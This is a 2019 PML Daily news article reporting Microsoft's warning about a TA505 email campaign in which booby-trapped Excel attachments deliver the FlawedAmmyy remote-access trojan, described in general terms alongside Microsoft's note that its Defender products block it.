• EDITORIAL POLICY
  • ABOUT US
PML Daily
No Result
View All Result
  • Home
  • NEWS
    • Politics
    • Education
    • Regional
    • Africa
    • World
  • INVESTIGATIONS
    • National Archives
    • Special Reports
  • OpEd
  • BUSINESS
    • Agriculture
    • Tech
    • Finance
  • FEATURES
    • Health
    • Tours & Travel
    • Entertainment
    • Society
  • COLUMNISTS
    • The Suited Penguin
  • SPORT
  • Jobs
  • Magazines
  • Home
  • NEWS
    • Politics
    • Education
    • Regional
    • Africa
    • World
  • INVESTIGATIONS
    • National Archives
    • Special Reports
  • OpEd
  • BUSINESS
    • Agriculture
    • Tech
    • Finance
  • FEATURES
    • Health
    • Tours & Travel
    • Entertainment
    • Society
  • COLUMNISTS
    • The Suited Penguin
  • SPORT
  • Jobs
  • Magazines
No Result
View All Result
PML Daily
No Result
View All Result
Home BUSINESS Tech

Microsoft warns users of new Malware attack via a disguised excel attachment

JAVIRA SSEBWAMI | PML Daily Staff WriterbyJAVIRA SSEBWAMI | PML Daily Staff Writer
June 25, 2019
2 0
2
SHARES
34
VIEWS
FacebookWhatsAppTwitter
Microsoft has warned users of malware disguised as an excel attachment. (PHOTO/File)

Microsoft is drawing attention to a new malware attack that infects Windows systems using its own Office software’s macro functions.

A new malware campaign is doing the rounds and it essentially employs a complex infection chain to download and run the notorious FlawedAmmyy RAT malware directly in memory.

The attack starts with an email and .xls attachment with content in the Korean language, indicating that it is primarily targeting Korean users.

It uses malicious macro functions in an Excel attachment to attack Windows PCs.

According to security firm Proofpoint, the malicious campaign has been started by a group called TA505.

They have been responsible for similar attacks in the past, the security firm says, and this particular latest trick involves a malicious email and an Excel attachment that Microsoft warns users from opening.

“When opened, the .xls file automatically runs a macro function that runs msiexec.exe, which in turn downloads an MSI archive. The MSI archive contains a digitally signed executable that is extracted and run[s], and that decrypts and runs another executable in memory,” Microsoft notes in its series of tweets.

A file called wsus.exe is then downloaded and decrypted, and it is intelligently designed to pass off as the official Microsoft Windows Service Update Service (WSUS).

It is digitally signed on June 19, and decrypts the payload in RAM, delivering the FlawedAmmyy payload.

Microsoft says that its Threat Protection defends customers from this attack. “Cloud-based machine learning protections in Microsoft Defender ATP blocked all of the components of this attack at first sight, including the FlawedAmmyy RAT payload. Office 365 ATP detects the email campaign,” the company notes.

Related

Leave a comment

Tags: ExcelMICROSOFTTech Newstop

Get real time update about this post categories directly on your device, subscribe now.

Unsubscribe

Advertisement

About

The PML Daily, published via www.pmldaily.com is a publication of Post Media Ltd, a professional Digital/New Media company in Uganda.

Follow us



  • EDITORIAL POLICY
  • ABOUT US

© 2022

No Result
View All Result
  • Home
  • NEWS
    • Politics
    • Education
    • Regional
    • Africa
    • World
  • INVESTIGATIONS
    • National Archives
    • Special Reports
  • OpEd
  • BUSINESS
    • Agriculture
    • Tech
    • Finance
  • FEATURES
    • Health
    • Tours & Travel
    • Entertainment
    • Society
  • COLUMNISTS
    • The Suited Penguin
  • SPORT
  • Jobs
  • Magazines

© 2022

Welcome Back!

Login to your account below

Forgotten Password?

Retrieve your password

Please enter your username or email address to reset your password.

Log In

Add New Playlist